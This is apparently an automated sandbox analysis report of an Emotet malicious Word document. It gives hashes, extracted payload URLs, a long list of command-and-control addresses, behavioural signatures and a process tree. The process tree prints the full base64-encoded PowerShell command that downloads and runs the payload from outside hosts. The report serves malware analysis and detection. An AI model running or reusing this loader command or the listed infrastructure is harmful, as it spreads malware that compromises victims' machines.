Analysis
-
max time kernel
139s -
max time network
134s -
platform
windows10_x64 -
resource
win10v200722 -
submitted
28-07-2020 19:21
Static task
static1
Behavioral task
behavioral1
Sample
emotet_e3_8b8a580cd020e0bd0471666b6354c24211f043403e1924ae8ae94c1b0a630c28_2020-07-28__192059._doc.doc
Resource
win7
General
-
Target
emotet_e3_8b8a580cd020e0bd0471666b6354c24211f043403e1924ae8ae94c1b0a630c28_2020-07-28__192059._doc.doc
-
Size
169KB
-
MD5
ddad3a37c0baf5a29ca82714192d633a
-
SHA1
abf92157c3674f7523669579fb83b2936de887b9
-
SHA256
8b8a580cd020e0bd0471666b6354c24211f043403e1924ae8ae94c1b0a630c28
-
SHA512
68bfa0abca5e93d43be987277469f643a89159e2d10fc31bbbe507486f02555151417ce8c29fffa51024e7cd039a7854992be34823ef68762b21bf828a36062c
Malware Config
Extracted
http://w3art.com/dtla/bBmTEkbPK/
http://www.stempora.com/@mer/ybV/
http://sundaystudio.net/cgi-bin/bzsvy9778486/
http://sujest.com/BL/nQsQRv/
http://studiotoybox.com/common/qezZSZB/
Extracted
emotet
177.37.81.212:443
74.207.230.187:8080
190.164.75.175:80
87.252.100.28:80
105.209.239.55:80
163.172.107.70:8080
37.208.106.146:8080
24.157.25.203:80
212.112.113.235:80
140.207.113.106:443
75.139.38.211:80
192.210.217.94:8080
46.49.124.53:80
75.127.14.170:8080
87.106.231.60:8080
139.59.12.63:8080
181.167.35.84:80
201.214.108.231:80
74.208.173.91:8080
189.146.1.78:443
212.156.133.218:80
37.70.131.107:80
181.113.229.139:443
144.139.91.187:80
50.116.78.109:8080
46.32.229.152:8080
80.211.32.88:8080
157.7.164.178:8081
113.161.148.81:80
37.46.129.215:8080
216.75.37.196:8080
78.188.170.128:80
192.241.220.183:8080
77.74.78.80:443
81.214.253.80:443
45.118.136.92:8080
113.160.180.109:80
143.95.101.72:8080
181.143.101.19:8080
190.111.215.4:8080
192.163.221.191:8080
203.153.216.182:7080
46.105.131.68:8080
177.144.130.105:443
51.38.201.19:7080
190.55.233.156:80
181.134.9.162:80
178.33.167.120:8080
41.185.29.128:8080
78.189.111.208:443
181.164.110.7:80
203.153.216.178:7080
115.79.195.246:80
195.201.56.70:8080
179.5.118.12:80
185.142.236.163:443
91.83.93.103:443
Signatures
-
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
powersheLL.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3460 816 powersheLL.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powersheLL.exedescription pid process Token: SeDebugPrivilege 3460 powersheLL.exe -
Executes dropped EXE 2 IoCs
Processes:
920.exeWindows.ApplicationModel.LockScreen.exepid process 3980 920.exe 3372 Windows.ApplicationModel.LockScreen.exe -
Blacklisted process makes network request 1 IoCs
Processes:
powersheLL.exeflow pid process 17 3460 powersheLL.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
920.exedescription pid process target process PID 3980 wrote to memory of 3372 3980 920.exe Windows.ApplicationModel.LockScreen.exe PID 3980 wrote to memory of 3372 3980 920.exe Windows.ApplicationModel.LockScreen.exe PID 3980 wrote to memory of 3372 3980 920.exe Windows.ApplicationModel.LockScreen.exe -
Emotet Payload 2 IoCs
Detects Emotet payload in memory.
Processes:
resource yara_rule behavioral2/memory/3980-10-0x00000000005B0000-0x00000000005BC000-memory.dmp emotet behavioral2/memory/3372-13-0x0000000000700000-0x000000000070C000-memory.dmp emotet -
Drops file in System32 directory 1 IoCs
Processes:
920.exedescription ioc process File opened for modification C:\Windows\SysWOW64\KBDIC\Windows.ApplicationModel.LockScreen.exe 920.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE -
Suspicious use of SetWindowsHookEx 13 IoCs
Processes:
WINWORD.EXE920.exeWindows.ApplicationModel.LockScreen.exepid process 4028 WINWORD.EXE 4028 WINWORD.EXE 4028 WINWORD.EXE 4028 WINWORD.EXE 4028 WINWORD.EXE 4028 WINWORD.EXE 4028 WINWORD.EXE 4028 WINWORD.EXE 4028 WINWORD.EXE 3980 920.exe 3980 920.exe 3372 Windows.ApplicationModel.LockScreen.exe 3372 Windows.ApplicationModel.LockScreen.exe -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 4028 WINWORD.EXE 4028 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 7 IoCs
Processes:
powersheLL.exeWindows.ApplicationModel.LockScreen.exepid process 3460 powersheLL.exe 3460 powersheLL.exe 3460 powersheLL.exe 3372 Windows.ApplicationModel.LockScreen.exe 3372 Windows.ApplicationModel.LockScreen.exe 3372 Windows.ApplicationModel.LockScreen.exe 3372 Windows.ApplicationModel.LockScreen.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\emotet_e3_8b8a580cd020e0bd0471666b6354c24211f043403e1924ae8ae94c1b0a630c28_2020-07-28__192059._doc.doc" /o ""1⤵
- Enumerates system info in registry
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: AddClipboardFormatListener
PID:4028
-
C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exepowersheLL -e JABZAFUATgBDAEwAbABoAHgAPQAnAEUASQBBAFYARQB2AHgAdgAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAEUAYABjAGAAVQBSAEkAVAB5AGAAUAByAE8AdABvAGAAYwBPAEwAIgAgAD0AIAAnAHQAbABzADEAMgAsACAAdABsAHMAMQAxACwAIAB0AGwAcwAnADsAJABSAE4ATgBZAEoAawB4AG8AIAA9ACAAJwA5ADIAMAAnADsAJABXAEYAVQBQAEMAZQBnAHMAPQAnAFkATgBTAEIATgBwAGwAcwAnADsAJABBAEsAWgBUAEkAdQBkAHYAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAFIATgBOAFkASgBrAHgAbwArACcALgBlAHgAZQAnADsAJABYAFkATgBNAEwAcwB6AG0APQAnAFcASgBSAEEATwBtAG8AcwAnADsAJABIAEMARwBPAEgAagB2AGkAPQAmACgAJwBuAGUAdwAnACsAJwAtACcAKwAnAG8AJwArACcAYgBqAGUAYwB0ACcAKQAgAE4AZQBUAC4AVwBlAEIAYwBMAGkAZQBuAHQAOwAkAFEATwBQAFMAWAB3AHkAZwA9ACcAaAB0AHQAcAA6AC8ALwB3ADMAYQByAHQALgBjAG8AbQAvAGQAdABsAGEALwBiAEIAbQBUAEUAawBiAFAASwAvACoAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAHMAdABlAG0AcABvAHIAYQAuAGMAbwBtAC8AQABtAGUAcgAvAHkAYgBWAC8AKgBoAHQAdABwADoALwAvAHMAdQBuAGQAYQB5AHMAdAB1AGQAaQBvAC4AbgBlAHQALwBjAGcAaQAtAGIAaQBuAC8AYgB6AHMAdgB5ADkANwA3ADgANAA4ADYALwAqAGgAdAB0AHAAOgAvAC8AcwB1AGoAZQBzAHQALgBjAG8AbQAvAEIATAAvAG4AUQBzAFEAUgB2AC8AKgBoAHQAdABwADoALwAvAHMAdAB1AGQAaQBvAHQAbwB5AGIAbwB4AC4AYwBvAG0ALwBjAG8AbQBtAG8AbgAvAHEAZQB6AFoAUwBaAEIALwAnAC4AIgBzAGAAUABMAGkAdAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAEUARQBLAFkARgB0AGQAeQA9ACcATABIAE4ARwBTAGQAeQB4ACcAOwBmAG8AcgBlAGEAYwBoACgAJABYAFcAQwBZAEIAbABrAG0AIABpAG4AIAAkAFEATwBQAFMAWAB3AHkAZwApAHsAdAByAHkAewAkAEgAQwBHAE8ASABqAHYAaQAuACIAZABPAGAAVwBuAEwATwBgAEEAZABgAEYAaQBMAGUAIgAoACQAWABXAEMAWQBCAGwAawBtACwAIAAkAEEASwBaAFQASQB1AGQAdgApADsAJABWAEsAVQBCAFEAcABsAGoAPQAnAEwAWQBaAEcATQB1AHoAaAAnADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0ASQAnACsAJwB0AGUAbQAnACkAIAAkAEEASwBaAFQASQB1AGQAdgApAC4AIgBsAEUAYABOAEcAdABoACIAIAAtAGcAZQAgADMAMAA1ADAAMQApACAAewAoAFsAdwBtAGkAYwBsAGEAcwBzAF0AJwB3AGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzACcAKQAuACIAYwByAEUAYABBAGAAVABFACIAKAAkAEEASwBaAFQASQB1AGQAdgApADsAJABaAFMAVQBJAE0AZABuAGUAPQAnAFEAUgBPAEIAUQBtAHMAaQAnADsAYgByAGUAYQBrADsAJABDAE4AVgBNAFYAawByAGEAPQAnAEYAVQBTAEgATABwAGsAeAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABCAEIASQBZAEQAbABnAHQAPQAnAFgAVwBJAFQAVQBtAGQAZQAnAA==1⤵
- Process spawned unexpected child process
- Suspicious use of AdjustPrivilegeToken
- Blacklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
PID:3460
-
C:\Users\Admin\920.exeC:\Users\Admin\920.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
PID:3980 -
C:\Windows\SysWOW64\KBDIC\Windows.ApplicationModel.LockScreen.exe"C:\Windows\SysWOW64\KBDIC\Windows.ApplicationModel.LockScreen.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: EnumeratesProcesses
PID:3372